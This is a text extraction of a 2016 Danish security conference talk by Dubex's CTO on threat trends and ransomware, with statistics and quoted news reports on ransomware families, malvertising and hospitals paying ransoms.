Trusselsbilledet - tendenser 2016 og frem

Størrelse: px
Starte visningen fra side:

Download "Trusselsbilledet - tendenser 2016 og frem"

Transkript

1 Trusselsbilledet - tendenser 2016 og frem Jacob Herbst, CTO, Dubex A/S DGI Byen, den 3. november 2016

2 Hvad skal vi have ud af dette indlæg? Mine mål med dette indlæg er at give svar på følgende: Hvad er trends og tendenser i forhold til hændelser? Hvad oplever vi aktuelt af angreb? Hvad er det aktuelle trusselsbillede og hvordan udvikler det sig? Hvad forventer vi, der kommer til at ske på sigt? Disclaimer: Sikkerhed er et meget stort emneområde, som er i konstant forandring. I løbet af de næste 25 minutter, når vi højest at skrabe en lille smule i overfladen.

3 HUSK: Udviklingen i trusselsbilledet sker ikke revolutionært, men evolutionært

4 Hændelser - eksempler

5 Dubex Security Analytics Center & Dubex Incident Response Team Ransomware Man-in-the-middle angreb på VPN forbindelse i Kina Ukendt Malware Ransomware tager dine data som gidsel ved at kryptere dem. Herefter tilbyder bagmændene at sælge dig nøglen. CEO-scam / målrettet svindel Kompromiterede web-servere Dubex Security Analytics Center Monitoring observationer: Interne systemer med malware Phishing-angreb Angreb mod webservere Brute force-angreb eks. ftp, ssh og SIP Mistænkelig trafik Uautoriseret trafik Andet skanninger Målrettet malware

6 Typiske observationer Interne systemer med malware/trojanske heste Phishing angreb Ransomware Angreb mod web-servere Sårbarheder, SQL injection, Ransomware og deface Bruteforce password cracking Scanning efter SIP services Uautoriseret & mistænkelig trafik CEO/CFO scam Andet scanninger

7 Angreb - aktuel status Mål Målrettede angreb efter fortrolige informationer Industrispionage Økonomisk berigelseskriminalitet Tyveri af kreditkortinformation Internetsvindel Afpresning Ransomware og DDoS Politisk motiveret Informationslækage Sabotage Metoder Angreb, der omgår perimeterforsvaret Angreb mod brugere Social engineering angreb f.eks. phishing Angreb via sociale netværk Webbaserede angreb Indirekte angreb rettet mod klienter Indirekte angreb via betroede eksterne tredjeparter Angreb sløret i krypteret ssl-kommunikation Sårbarheder og avancerede dag-0-angreb Hurtig udnyttelse af sårbarheder Udnyttelse af ukendte sårbarheder dag-0 Unik og målrettet malware

8 Avancerede angreb er blevet det normale Mange målrettede angreb er stadig forholdsvis simple -- De fleste såkaldt avancerede angreb starter stadig med en sendt til den rette person med det rette indhold Drivere bag cyberkriminalitet Automatisering Samarbejde og videndeling Profit Cyberkriminalitet er en lukrativ forretning, og det er nemt at starte Anonymitet Betalingsinfrastruktur Undergrundsmiljø hvor de kriminelle handler med informationer Metoder, som tidligere kun blev brugt i målrettede angreb, anvendes nu af almindelige kriminelle Malware er blevet mere avanceret How Industrial Hackers Monetize the Opportunity Social Security $1 DDOS as a Service ~$7/hour Credit Card Data $0.25-$60 Medical Record >$50 Bank Account Info Mobile Malware $150 Spam Exploits Malware Development $2500 Facebook Account with 15 friends >$1000 (depending on account type and balance) $50/500K s $1000-$300K $1 Source: RSA/CNBC

9 Malware - Udviklingsproces Sløring og kvalitetstestning Malware er vidt udbredt og kan fremstilles, så det omgår det traditionelle perimeterforsvar og anden beskyttelse Original Malware Permutationer Kvalitetstestning Deployering Afvist hvis detekteret af anti-virus software Mange forskellige varianter af samme malware fremstilles automatisk forud for et angreb Kun varianter, der kommer igennem kvalitetstestningen (=omgår antivirus) bruges i selve angrebet De nye varianter frigives med jævne mellemrum for konstant at være foran antivirus mønster opdateringerne nye malware filer i timen

10 Verizon 2016 Data Breach Investigations Report 85% Myth #1: Hackers always carefully select a target and then hit them with a zero-day attack Truth: Most attacks are opportunistic, indiscriminate and exploit known vulnerabilities. The top 10 vulnerabilities account for 85% of successful exploit traffic. And the remaining 15% consists of over 900 Common Vulnerabilities and Exposures (CVEs). 30% Myth #4: No one falls for phishing anymore Truth: Phishing is on the rise. 30% of phishing s are opened. And about 12% of targets go on to click the link or attachment. 93% Myth #2: Attackers are fast. But the good guys are catching up Truth: The gap between compromise and detection is widening. In 93% of breaches attackers take minutes or less to compromise systems. But four out of five victims don t realize they ve been attacked for weeks or longer. And in 7% of cases, the breach goes undiscovered for more than a year 80% Myth #5: Cyber-espionage attacks are widespread and increasing. Truth: Money remains the main motive for attacks. 80% of analyzed breaches had a financial motive. Make your defenses good enough and attackers will move on to easier targets. 63% Myth #3: Passwords prove the identity of authorized users Truth: 63% of confirmed data breaches leverage a weak, default or stolen password 95% Myth #6: It s all too complicated. The bad guys have won Truth 95% of breaches fit into just nine attack patterns. Understand them and you ll be better able to make the right investments and protect your organization.

11 Threat Landscape for 2016 and beyond

12 IT trends - Technology Changes New technologies Cloud Social media Mobil Big data Internet of things New innovative usage of the new technologies Sharing Economy Intelligent housing Streaming media services Mobile Payment Wearables BYOx Different changes in multiple fields effect cyber security Attacks against other vectors New methods New precedents New technologies New attackers Geopolitical Ransomware be applied to IoT A car lockdown? A house blackout? A pacemaker threat?

13 Threat Trends Vulnerabilities Vulnerabilities found instandard libraries Day-0 Vulnerabilities keep being found sold on black market, used in exploits Hacking of IoT devices Malware Malware is constantly adapting to bypass defenses More advanced attacking new platforms and operating systems Cross-platform attacks Advanced Persistent Threats APT technics are commoditized and widespread APT methods are evolving automation More states involved in cyber warfare Mobile Classic threats migrate to mobile: phishing, rootkits, malware Mobile specific exploit kits Malware will target more than SMS Attacks on mobile payment The dark internet Cybercriminals Will Rely on Anonymity Networks Use of non-traceable virtual currencies Cybercriminals are always looking for other ways to monetize Miscellaneous trends Information leaked for brand damage Compromising via third party IPv6 is becoming more widespread Attacks on 2FA systems Hacktivism and politically motivated hacking

14 Threat Trends - Attackers Evolve, Adapt, and Accelerate Attackers Attackers are nimble, opportunistic, cooperative, skilled, and relentless Their motivation, resiliency, and creativity drives great adaptability Acceleration in their methods, tools, and targets (technology, people, processes) Multivector Low and Slow Targeted Evasive Dark markets and services grow to enable New data breach targets emerge Attackers drive down the technology stack (data, apps, VM, OS, VMM, FW, HW) Research follows quickly into new areas of technology Ransomware and CEO fraud rises Integrity attacks grow Technology adoption dramatically expands the threat landscape Opaque algorithms compromise integrity Low Tech/Phishing Monetized Nation State Cyber insurance safety net is pulled away

15 Blinded by Encryption HTTPS will exceed HTTP this year at many enterprises edges (webservers) Decryption Stats: 90% decrypt inbound traffic in front of public facing web servers SSL/TLS traffic is pervasive and showing no signs of slowing down: SSL traffic is growing at 20% per year* Gartner Up to 50% of ALL enterprise traffic is encrypted with SSL/TLS* Let s Encrypt initiatives further increase network encryption adoption Google positively raises search rankings of sites that use encryption with SSL/TLS In 2017, more than half of the network attacks targeting enterprises will use encrypted traffic to bypass controls, up from less than 5% today SSL/TLS is used by cybercriminals to hide advanced malware and exfiltrate proprietary data Malware observed using anti-forensics techniques through encryption of toolkits, generating code in memory and never writing to disk Last quarter, 88% of attacks over HTTP, 12% HTTPS (Source: Akamai) Evasion has evolved to being a characteristic of attacks, rather than a solo means of attack. Malware Families using SSL traffic: Jan Oct. 2015: 500+ Oct Jan. 2016: Command & Control Servers (C&C) using SSL/TLS: Oct. Dec. 2014: Jan Jan. 2016: Nefarious C&C communications using SSL traffic with non-standard TCP ports

16 Vulnerabilities Old vulnerabilities being found Recent Crypto Vulnerabilities Abound Vulnerabilities Even more vulnerabilities like Heartbleed and ShellShock will emerge from decades-old source code Vulnerabilities in Open Source are easy to find and exploit All software are build using standard libraries and components Day-0 Vulnerabilities keep being found by attackers and used in exploits Hacking of devices smart TV's, cars (carjacking), buildings, machinery, etc. Expected that main focus will be OT/ICS systems Attacks on web servers - Web server vulnerabilities and vulnerabilities especially in content management systems (Joomla, Wordpress, etc.) are being abused to compromise and hosting of malware - a focus on updates, patching and configuration CacheBleed Heartbleed Poodle OprahSSL LOGJAM FREAK Early CCS DROWN Implementation Flaws Timing Attack MITM to Downgrade Security Select Unsecure Algorithm

17 Economy of Zero Days Day-0 Vulnerabilities found by greyhat attackers and sold Both a grey and black market Ability to protect is progressively compromised Researchers silenced to hide security vulnerabilities

18 Rise in Malware & Digital Theft and Fraud Malware trends Digital Theft and Fraud More advanced attacking new platforms and operating systems Mobile devices OSX Windows 64 bit Signed malware & rootkits Command and Control instructions will increasingly be hosted on legitimate sites and using legitimate services (Twitter, Google etc.) As virtualization gaining more and more attacks have targeted virtual environments. Malware can detect and differentiate between Sandbox environment and true server environment Cross-platform attacks - attacks between different platforms - smartphones to desktops, desktops, smart TV's, refrigerators and washing machines etc. More successful financial fraud and theft Number of attacks increase, externals and internals, from across the globe Higher cost incidents, millions-billion dollar attacks Malware is constantly adapting to the security market Cybercriminals are finding new ways to corporate and overcome cultural differences Breakdown of boarders geography and technology More opportunities to steal, extort, and commit fraud. Greed principle prevails Attackers are organized, share methods and tools Threats not limited by geography

19 Advanced Persistent Threats & The State-Sponsored Threat The State-Sponsored Threat Advanced Persistent Threats Almost all enterprises should treat state threats as part of usual advanced threats. Certain verticals and industries do need to take more focused actions State-sponsored attack teams in many countries "freelance" after hours. Techniques will be the same but the targeting and level of stealthiness will differ Rogue governments use terrorist groups to launch cyberattacks Don't hack back. Unless you are the state. And maybe not even then Don't neglect best-practice level safeguards to focus on more advanced attacks Broad adoption by many nations of cyber-offense capabilities. Governments incorporate cyber into their defense apparatus with clear objectives and deployable systems. Trickle-down effect gives advanced technology to criminals and attackers Reverse engineered code is reused by other threats Attackers don t need to invest in developing high-end exploits, instead they harvest what governments create APT technics are getting commoditized and widespread More actors using APT kind of attach methods APT methods are also evolving Automation are being used to do wide spread attacks Automation are used to harvest social media Automation are used to generate unique and undetectable malware Communication and data exfiltration are moved from FTP to https, TOR and Cloud Services like Dropbox, Google Apps. Etc. 29 countries have formal cyberwarfare units $19 billion US 2017 proposed budget for cybersecurity More and more states are getting in for cyber warfare Government Supported attack will - despite Snowden - continue - both as a spy on companies and the public sector but also as actual cyber warfare 63 countries use cyber tools

20 Mobile Classic threats migrate to mobile: Phishing Ransomware Overlay Mobile specific exploit kits Bundling frameworks and services (perhaps automated) Device takeover malware for mobile Continued malware and other privacy infringing software in appstores - primarily Google Appstore. Knowledge of development for mobile platforms is growing and thus knowledge of how attacks can be carried out. Lots of focus on security on Apple IOS devices Problems with Jailbroken devices and false appstores spreading Mobile malware will target more than SMS The adoption of smartphones and the use of mobile payment, online access, etc. makes them a tempting target for cyber criminals - NFC, ApplePay new targets Google Android is especially a likely target due to non-enforced security implementation

21 Internet of Things Sensors and Devices (Things) Data aggregaters Gateways Communication infrastructure & Cloud Data consumers Enterprise Integrity Data Confidentiality Availability Data Availability Confidentiality 6 out of the 10 popular IoT devices did not use encryption when downloading software updates. 90 % of the devices collected at least one piece of personal information via the device, the cloud, or its mobile application. 70 % of the devices used unencrypted network service and transmitted credentials in plain text Source: HPE 1. Insecure web interface 2. Insufficient authentication 3. Insecure network services 4. Lack of transport encryptions 5. Privacy concerns 6. Insecure cloud interface 7. Insecure mobile interface 8. Insufficient security configurability 9. Insecure software 10. Poor physical security Source: OWASP Safety Pepole & Enviroment Data Integrity

22 IoT - Life Safety and Cybersecurity Intersect in Products Industrial and consumer products are being connected to the internet Billions of IoT devices gather data and exert direct control Risk of catastrophic impacts as our reliance and trust increase Many IoT devices have publicly exposed administrative ports protected only by default passwords The devices lack security software such as anti-virus Residential customers and small businesses that lack security sophistication are in charge of protecting the devices Typically IoT gear is connected to the internet all the time Attackers don t have to deal with social engineering, poisoning or expensive zero day attacks Risks first emerge for the transportation, healthcare, and industrial sectors As IoT-devices explode in number and function, so will the potential misuse Remote devices, cameras, and drones become more concerning to safety and privacy. Expect more regulations

23 The dark internet Cybercriminals Will Rely on Anonymity Networks Accessing TOR and other networks is becoming easier Safer cybercrime ecommerce platform & Virtual currency - BitCoin Safer for malware infrastructure (i2ninja, Chewbacca ) Also presents challenges Broader adaptation of anonymity networks and encryption Continued and expanded use of non-traceable virtual currencies in the criminal community Cybercriminals are always looking for other ways to monetize Example - Healthcare: Seller: Easier to steal - More profitable than a credit card Buyer: Harder to detect - Many opportunities and Healthcare information stays current

24 Ransomware sager

25 Hændelser - Danmark Kommuner udsat for hackerangreb og afpresning Af Jens Beck Nielsen og Henrik Jensen 22. januar 2015, 22:30 Flere kommuner er nu for første gang blevet angreb af hackere, som kræver penge for at trække sig. En voldsom aktivitet på Gribskov Kommunes drev afslørede mandag eftermiddag, at kommunen for første gang var ramt af cyberangreb. Hackere havde krypteret filer i kommunens systemer og forlangte penge for at slippe kontrollen over dem. Kommunen afviste at betale og politianmeldte sagen, som i går blev sendt videre til Europol. Foreløbig er der ikke noget, der tyder på, at følsomme oplysninger om borgerne er sluppet ud, men kommunaldirektør Holger Spangsberg Kristiansen understreger, at angrebet tages»meget, meget alvorligt.«to kommuner er ramt, men der er højst sandsynligt flere, som der ikke er kendskab til endnu, forklarer Mads Nørgaard Madsen, sikkerhedsekspert og partner i revisionsfirmaet PWC, der har været i kontakt med de ramte kommuner. Ifølge Mads Nørgaard Madsen skyder hackerne med spredehagl og krypterer vilkårlige filer. Og ifølge ham er der altså ikke etale om målrettede forsøg på at stjæle f.eks. personfølsomme oplysninger.»det handler her om at lave så meget ravage som muligt, så man kan kræve så mange penge som muligt. I tilfældet her har hackerne henvendt sig via mail, og nogle brugere er kommet til at hente en inficeret fil ned. Derfor handler det også om, at der kommer en øget bevidsthed om sikkerheden. Uden at pege fingre kunne det måske have imødegået disse angreb,«siger Mads Nørgaard Madsen. Ond postvirus angriber danske virksomheder Mandag d. 28. september 2015, kl / Thomas Breinstrup PostDanmark har politianmeldt virus, som foregiver at komme fra postvæsenet, men som låser folks filer og kræver løsepenge. En særdeles ondsindet computervirus, som udgiver sig for at komme fra postvæsenet, spreder sig i Danmark og koder filer, så man ikke længere har adgang til dem. Menneskelig fejl kan være årsag til cyberangreb mod kommuner Angreb som det, der har ramt Gribskov kommune, skyldes oftest menneskelige fejl - men Danmark kan være i sigtekornet netop nu, mener ekspert. Af Mads Allingstrup / 22. JAN KL Mens Gribskov, Nordfyns og måske endnu flere kommuner netop nu kæmper med at slippe fri af et nedrigt angreb mod deres IT-systemer, er der sansynligvis en eller flere ansatte i kommunerne, der går rundt med røre øren Ransomware-angreb skyldes nemlig oftest menneskelige fejl, hvor folk kommer til hente en fil, de ikke skulle have hentet, eller klikker på et link eller en vedhæftet fil i en mail, der viser sig at være inficeret. Sådan lyder vurderingen fra direktør fra sikkerhedsorganisationen DK-Cert, Shehzad Ahmad, der så sent som i sidste uge stod bag en rapport om danskernes IT-sikkerhed, hvor Ransomware specifikt var nævnt som et stigende problem. Ofte vedhæftede filer - Man kan ikke udelukke, at dette er et målrettet angreb, men det vi normalt ser er, at det et menneske, der selv sætter processen i gang. Det kan være en person i en regnskabsafdeling, der har klikket på en tilsendt opgørelse, eller en person, der har klikket på et link i en mail. Ransomware er et af de mest nedrige typer af angreb, fordi den skadelige kode aktivt forsøger at 'kapre' brugerens computer og kræver løsepenge for at slippe den fri igen. De ekstra avancerede typer af ransomware krypterer sågar brugerens filer, eller bestemte filtyper, fx Excel-ark med en meget hård kryptering, der ikke let kan brydes. Herefter kræver bagmændene løsepenge for at låse computeren op - men selv om man betaler, er det langt fra altid, at de faktisk holder deres løfte og sender nøglen, så man kan få filerne fri. PostDanmark advarer på sin forside mod den falske besked, som mange danskere har modtaget, og som rummer en farlig virus.

26 Cyber afpresning Cyber afpresning er online kriminalitet, der involverer et angreb eller trussel om angreb mod en person eller virksomhed, kombineret med et krav om betailing for at stoppe angrebet Cyber extorsion Cyber pengeafpresning kan ske på flere måde - kryptere data og holde den som gidsel, stjæle data og truende eksponering, nægte adgang til data, angribe systemer så de bliver utilgængelige DDos Ransomware Blackmail Cyber afpresning er ikke noget nyt Volumetric: Flooding Encrytion Ransomware Release confidential information Ressource Consuming Locker Ransomware

27 Sager i medierne Ransomware - Manglende patching førte til ransomware - Tre måneder efter hackerangrebet er der stadig eftervirkninger af det digitale indbrud og ekstraarbejde i bogholderiet. - Løsesummen lød på omkring kroner, hvilket var tilpas lavt, men kommunikationen med hackerne trak i langdrag. De endte med at trække stikket på hele det gamle it-setup i stedet. - Nu handler det derfor også om at forberede sig på nye trusler. -»Man tror jo ikke, at det sker for en selv. Men tro ikke, at det ikke sker for dig. Nu er det ikke længere et spørgsmål om, hvem der bliver hacket, men hvornår man bliver det.«

28 Sager i medierne Målrettet

29 Hændelser - globalt

30 Ransomware angreb Typisk forløb for et Ransomware angreb Phishing angreb Angreb Malware Download & Kontakt Udveksling af nøgler Kryptering af data Visning af afpresning (Betaling) (Oplåsning af filer) En række brugere modtager phising-mail Bruger åbner vedlagt fil eller tilgår link Brugerens maskine inficeres med malware Crypto ransomware downloaded Malware kontakter Command & Contol Server Udveksling af public / private key nøgler til kryptering Filerne på den ramte computer bliver krypteret Offeret vises besked med deadline og løsesum Offeret betaler løsesum via Tor netværket med Bitcoins Offeret modtager nøgle til dekryptering af data

31 Ransomware tendenser

32 Hvad er udviklingen omkring Ransomware? (1/2) Aktuel status og tendenser Aktuelle data viser, at næsten 70% af hændelser rammer små og mellemstore virksomheder, efterfulgt af store virksomheder og private dog er der formentlig et stort antal mørke tal i statistikken Flere forskellige filtyper end tidligere bliver ramt dette for at ramme flere samt ramme særlige filtyper med stor værdi for offeret fx filer med gemte spil hos gamere og CAD-tegninger i en ingeniørvirksomhed eller tegnestue Krypto-ransomware er blevet mere virksomhedsrettet tidligere var det primært rettet mod private, men nyere udgaver går efter professionelle filtyper, netværksdrev (fx CryptoFortress) og kræver en højere løsesum Ransomware med netværksorm funktionalitet dvs. spredning internt i virksomhederne til alle servere og klienter potentiale for meget større skade og afpresning af større beløb Tyveri af data med efterfølgende afpresning under trussel om offentliggørelse på af personlige og følsomme data på Internettet Kriminelle (Cyber mafia) vil målrettet angribe konsulent virksomheder og myndigheder med ransomware og afpresse store beløb fra organisationer, der ikke ønsker deres forretning forstyrret eller deres intellektuelle ejendom kompromitteret De fleste krypto-ransomware kalder sig CryptoLocker simpelthen for at bruge det brand navn som Cryptelocker har fået opbygget

33 Hvad er udviklingen omkring Ransomware? (2/2) Aktuel status og tendenser Filnavne krypteres så det bliver mere vanskeligt at se hvad der er blevet krypteret. Unik krypteringsnøgle for hver fil Krypto-ransomware er gået "freemium." Afkod et par filer gratis for at overbevise ofrene om, at de rent faktisk får adgang til deres data, hvis de betaler Offline kryptering dvs. krypteringen kan starte uden klienten har Internet adgang Nyere Cryptolocker sletter Volule Shadow kopier (Windows indbyggede backup funktion), således at offeret ikke kan genskabe data den vej igennem Nye sovende og slørede ransomware varianter der i skjul krypterer data Tillader stadig adgang til data Der ventes indtil en backup er foretaget (så backuppen også indeholder krypterede data). Derefter fjernes krypteringsnøglen og der kræves en (meget stor) løsesum Ransomware-as-a-service hostet på TOR-netværket og brug af Bitcoin til løsepenge betaling gør det muligt nemt at starte som cyber kriminel Ransomware attacks doubled in 2015 Over half (54%) of all malware targeting UK users in 2015 contained some form of ransomware.

34 Seneste eksempler

35 Ransom32: Javascript-only Ransomware-as-a-Service (RaaS) Fully developed in JavaScript, HTML and CSS using NW.js (http://nwjs.io/) Potentially allows for multi-platform infections after repackaging for Linux and MacOS X Do not confuse Java and JavaScript Java - object oriented programming language, originally developed by Sun and now owned by Oracle JavaScript - object oriented client-side scripting language that is implemented in the browser NW.js bundle node.js, standard JavaScript scripts, and Chromium into a single executable Chrome executes and launches the JavaScript scripts The malware package is a self-extracting RAR file of 22MB which expands to over 67MB NW.js is a legitimate framework so antivirus signature coverage very bad No administrative rights necessary. Runs under the security context of the user All you need to get your own customized ransomware is a Bitcoin address to send your earnings to Kilder:

36 Android SimpleLocker May 2014 Simplelocker appears in Ukraine Asks for $22 USD using Monexy Uses TOR for C&C Checks SD card for: jpeg, jpg, png, bmp, gif, pdf, doc, docx, txt, avi, mkv, 3gp, mp4 Unlike Cryptolocker, Encryption key is hardcoded on the malware. Encrypted files are appended with.enc.

37 Ransomweb Ransomweb that encrypts websites and web servers RansomWeb: Crooks Start Encrypting Websites And Demanding Thousands High-Tech Bridge: Of Dollars From Businesses Thomas Fox-Brewster Jan 28, 07:36 AM In December 2014, our security experts discovered a very interesting case of a financial company website compromise: the website was out of service displaying a database error, while the website owner got an asking for a ransom to decrypt the database. Web application in question was pretty simple and small, but very important for business of the company that could not afford to suspend it, neither to announce its compromise. Careful investigation that we performed revealed the following: The web application was compromised six months ago, several server scripts were modified to encrypt data before inserting it into the database, and to decrypt after getting data from the database. A sort of on-fly patching invisible to web application users. Only the most critical fields of the database tables were encrypted (probably not to impact web application performance a lot). All previously existing database records were encrypted accordingly. Encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by various traffic monitoring systems). During six months, hackers were silently waiting, while backups were being overwritten by the recent versions of the database. At the day X, hackers removed the key from the remote server. Database became unusable, website went out of service, and hackers demanded a ransom for the encryption key. In another startling development in the world of cyber crime, malicious hackers have started taking over website servers, encrypting the data on them and demanding payment to unlock the files. A large European financial services company, whose name was not disclosed, was the first known victim of this potentially businessdestroying attack, according to Swiss security firm High-Tech Bridge, which investigated the breach in December The security firm labelled the attack RansomWeb. The brazen techniques used and the high ransom represent a more aggressive take on ransomware malware which encrypted people s PCs and asked for payment, typically between $100 and 1,000. Though only a handful of attacks have been seen, many expect such extortion to grow rapidly in The initial attack started six months prior to the victim s website being shut down by the hackers, who were surreptitiously locking up the most critical data on the server using on-the-fly tweaks to the site s PHP code functions. The criminals stored the key to decrypt the data on their own remote web server accessible only via HTTPS encrypted communications, supposed to guarantee no one with visibility on those connections could get access to the data but them. As soon as they pulled the key and data was no longer being silently encrypted and decrypted, the website was knocked out of action. That s when employees at the financial services firm were sent s from a Gmail account, demanding the firm pay $50,000 to get their website back. They threatened to increase the price by 10 per cent with every passing week. 15/01/28/ransomweb dollar-extortion/

38 PadCrypt: Ransomware with Live Support Chat & Uninstaller PadCrypt Ransomware Provides Victims with Live Support Ransomware also includes an uninstaller, out of all things Feb 14, :51 GMT By Catalin Cimpanu Share: Security researchers have identified a new ransomware family that goes by the name of PadCrypt, which is unique because it provides a live support chat window for all victims, along with an uninstaller. Detected yesterday, researchers presume that PadCrypt was created on top of an older version of the infamous CryptoWall ransomware family. Researchers aren't yet entirely sure how this ransomware spreads, but clues hint at the fact that it may arrive on victims' computers via attachments disguised as PDF files. Once the user opens this PDF, PadCrypt goes to work, encrypting their files and deleting shadow volume data, preventing HDD recovery software from recouping copies of the original unencrypted files. By doing this, users can recover their locked files only by paying the ransom or by restoring them from an older backup, stored offline, where the ransomware can't reach. PadCrypt lets victims talk to the ransomware's operators At this point, the ransomware will also drop text and HTML files with ransom notes in every directory it locked files in, and will also show a popup window with another copy of the ransom note, which requests payment of 0.8 Bitcoin (~$320 / 285). What's strange about this popup window is that it includes a small link in the bottom left corner that reads "Live Chat." Pressing this link opens a live support chat window that allows the victim to talk to PadCrypt's operators. Currently, this feature is broken, since the PadCrypt C&C (command and control) server seems to be down shtml

39 CERBER: Crypto-ransomware that Speaks Cerber has taken creepiness for victims and affordability for criminals to a new level Lucian Constantin By Lucian Constantin IDG News Service Mar 4, :07 AM PT A new file-encrypting ransomware program called Cerber has taken creepiness for victims, but also affordability for criminals, to a new level. In terms of functionality Cerber is not very different than other ransomware threats. It encrypts files with the strong AES-256 algorithm and targets dozens of file types, including documents, pictures, audio files, videos, archives and backups. The program encrypts file contents and file names and changes the original extensions to.cerber. It can also scan for and encrypt available network shares even if they are not mapped to a drive letter in the computer. Once the encryption process is done, Cerber will drop three files on the victim's desktop named "# DECRYPT MY FILES #." They contain the ransom demand and instructions on how to pay it. One of those files is in TXT format, one is HTML and the third contains a VBS (Visual Basic Scripting). The VBS file is unusual. According to Lawrence Abrams, administrator of the technical support forum BleepingComputer.com, the file contains text-to-speech code that converts text into an audio message. "When the above script is executed, your computer will speak a message stating that your computer's files were encrypted and will repeat itself numerous times," Abrams said in a blog post. According to Cyber intelligence outfit SenseCy, Cerber's creators are selling the ransomware as a service on a private Russian-language forum. This makes it available to low-level criminals who might not have the coding skills or resources to create their own ransomware. It also means that this threat might see widespread distribution /security/cerber-ransomware-sold-asa-service-speaks-to-victims.html

40 KeRanger ransomware - First working Apple Mac ransomware First working Apple Mac ransomware infects Transmission BitTorrent app downloads If you installed 2.90, you've got a few hours to get rid of it 7 Mar 2016 at 06:02, Darren Pauli The first "fully functional" ransomware targeting OS X has landed on Macs after somehow smuggling itself into downloads of the popular Transmission BitTorrent client. Transmission's developers have warned in a notice splashed in red on the app's website that if you fetched and installed an afflicted copy of the software just before the weekend, you must upgrade to a clean version. Specifically, downloads of version 2.90 were infected with ransomware that will encrypt your files using AES and an open-source crypto library, and demand a payment to unscramble the documents. Transmission has millions of active users. It is possible the app's website servers were compromised, and the downloads tampered with to include the KeRanger nasty. Those who have had files encrypted will be asked by the malware to cough up US$400 in Bitcoins, paid to a website hidden in the Tor network, to get their files back. "Everyone running [version] 2.90 on OS X should immediately upgrade to and run 2.92, as they may have downloaded a malware-infected file," the Transmission authors posted on Sunday. mac_ransomware_infects_transmission_users/

41 Malvertising Several high-profile media sites, including the New York Times, the BBC, MSN and AOL, are falling victim to a new rash of malicious ads that attempt to surreptitiously inflict malware on unsuspecting site visitors According to Malwarebytes, other infected sites in what is almost certainly a coordinated attack include the Comcast outpost My.Xfinity, NFL.com, Realtor, TheWeatherNetwork, Newsweek and thehill. It remains to be seen how many individuals have been impacted, the company said by . At least five of the largest websites attacked have well over 100 million visitors a month. And that means that the campaign has likely exposed tens of thousands of people over the past 24 hours alone, installing mainly crypto ransomware. Big-name sites hit by rash of malicious ads spreading crypto ransomware New malvertising campaign may have exposed tens of thousands in the past 24 hours. by Dan Goodin - Mar 15, :37pm CET Mainstream websites, including those published by The New York Times, the BBC, MSN, and AOL, are falling victim to a new rash of malicious ads that attempt to surreptitiously install crypto ransomware and other malware on the computers of unsuspecting visitors, security firms warned. The tainted ads may have exposed tens of thousands of people over the past 24 hours alone, according to a blog post published Monday by Trend Micro. The new campaign started last week when "Angler," a toolkit that sells exploits for Adobe Flash, Microsoft Silverlight, and other widely used Internet software, started pushing laced banner ads through a compromised ad network. According to a separate blog post from Trustwave's SpiderLabs group, one JSON-based file being served in the ads has more than 12,000 lines of heavily obfuscated code. When researchers deciphered the code, they discovered it enumerated a long list of security products and tools it avoided in an attempt to remain undetected. "If the code doesn't find any of these programs, it continues with the flow and appends an iframe to the body of the html that leads to Angler EK [exploit kit] landing page," SpiderLabs researchers Daniel Chechik, Simon Kenin, and Rami Kogan wrote. "Upon successful exploitation, Angler infects the poor victim with both the Bedep trojan and the TeslaCrypt ransomware double the trouble." Update: According to a just-published post from Malwarebytes, a flurry of malvertising appeared over the weekend, almost out of the blue. It hit some of the biggest publishers in the business, including msn.com, nytimes.com, bbc.com, aol.com, my.xfinity.com, nfl.com, realtor.com, theweathernetwork.com, thehill.com, and newsweek.com. Affected networks included those owned by Google, AppNexis, AOL, and Rubicon. The attacks are flowing from two suspicious domains, including trackmytraffic[c],biz and talk915[.]pw. The ads are also spreading on sites including answers.com, zerohedge.com, and infolinks.com, according to SpiderLabs. Legitimate mainstream sites receive the malware from domain names that are associated with compromised ad networks. The most widely seen domain name in the current campaign is brentsmedia[.]com. Whois records show it was owned by an online marketer until January 1, when the address expired. It was snapped up by its current owner on March 6, a day before the malicious ad onslaught started.

42 PowerWare living of the land A new ransomware program written in Windows PowerShell is being used in attacks against enterprises, including health care organizations, researchers warn. PowerShell is a task automation and configuration management framework that's included in Windows and is commonly used by systems administrators. It has its own powerful scripting language that has been used to create sophisticated malware in the past. The new ransomware program, dubbed PowerWare, was discovered by researchers from security firm Carbon Black and is being distributed to victims via phishing s containing Word documents with malicious macros, an increasingly common attack technique. The Carbon Black team found PowerWare when it targeted one of its customers: An unnamed healthcare organization. Multiple hospitals have recently fallen victim to ransomware attacks.

43 Petya ransomware - disk-level encryption Petya Ransomware Encrypt Master File Table Making it impossible for users to access their files or their operating system unless they obtain a key Petya spreads through links to Dropbox in messages

44 SamSam Target Ransomware Ransomware SamSam - MSIL/Samas.A Distributed via compromising servers Move laterally through the network to compromise additional machines Focus appears to have been healthcare industry Much higher ransom demand

45 Betaling af ransomware Hollywood Presbyterian Medical Center University of Calgary Los Angeles hospital paid $17,000 in bitcoin to ransomware hackers Thursday 18 February GMT // Danny Yadron in San Francisco A Los Angeles hospital hit by ransomware swallowed the bitter pill: it paid off the hackers. University pays almost $16,000 to recover crucial data held hostage by Dan Goodin - Jun 8, :54pm CEST "The last thing we want to do is lose someone s life s work," official says. Canada's University of Calgary paid almost $16,000 ($20,000 Canadian, ~ 10,800) to recover crucial data that has been held hostage for more than a week by crypto ransomware attackers. The ransom was disclosed on Wednesday morning in a statement issued by University of Calgary officials. It said university IT personnel had made progress in isolating the unnamed ransomware infection and restoring affected parts of the university network. It went on to warn that there's no guarantee paying the controversial ransom will lead to the lost data being recovered. Hollywood Presbyterian Medical Center had lost access to its computer systems since 5 February after hackers installed a virus that encrypted their computer files. The only out was if the hospital paid the hackers $17,000 worth of bitcoins, the digital currency. On Wednesday, the hospital announced that it had relented. The quickest and most efficient way to restore our systems and administrative functions was to pay the ransom, Allen Stefanek, president and chief executive of Hollywood Presbyterian, said in a letter Wednesday. In the best interest of restoring normal operations, we did this. The move is one of the most high-profile examples of a hacking victim paying the fee for so-called ransomware, a money-making favorite of eastern European hackers these days. "Ransomware attacks and the payment of ransoms are becoming increasingly common around the world," Wednesday's statement read. "The university is now in the process of assessing and evaluating the decryption keys. The actual process of decryption is time-consuming and must be performed with care. It is important to note that decryption keys do not automatically restore all systems or guarantee the recovery of all data. A great deal of work is still required by IT to ensure all affected systems are operational again, and this process will take time. The payment of ransoms has been controversial because the action only encourages a form of computer crime that's growing increasingly rampant and aggressive since it first came into vogue in late In an article published Tuesday by The Globe and Mail, University Vice President Linda Dalgetty said once the network was infected, the university couldn't risk losing critical data. We 